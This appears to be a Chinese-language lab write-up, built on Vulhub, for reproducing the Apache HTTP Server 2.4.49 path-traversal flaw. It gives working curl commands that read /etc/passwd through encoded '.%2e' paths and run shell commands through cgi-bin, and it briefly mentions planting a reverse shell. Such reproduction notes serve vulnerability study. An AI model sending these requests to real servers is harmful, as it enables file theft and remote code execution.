漏洞环境均基于Vulhub
原因、版本
Apache HTTP 服务器项目致力于为包括 UNIX 和 Windows 在内的现代操作系统开发和维护开源 HTTP 服务器。
在 Apache HTTP Server 2.4.49 中对路径规范化所做的更改中发现了一个缺陷。攻击者可以使用路径遍历攻击将 URL 映射到预期文档根目录之外的文件。
如果这些目录之外的文件不受通常的默认配置“要求全部拒绝”的保护,则这些请求可以成功。如果还为这些别名路径启用了 CGI 脚本,则可以允许远程代码执行。
复现
重现漏洞的简单 CURL 命令(注意/icons/必须是现有目录):
curl -v --path-as-is http://101.43.191.94:8080/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd

在服务器上启用 mods cgi 或 cgid 后,此路径遍历漏洞将允许执行任意命令:
curl -v --data "echo;id" 'http://101.43.191.94:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh'

反弹shell
写一个反弹脚本文件到目标机器、给执行权限,执行。
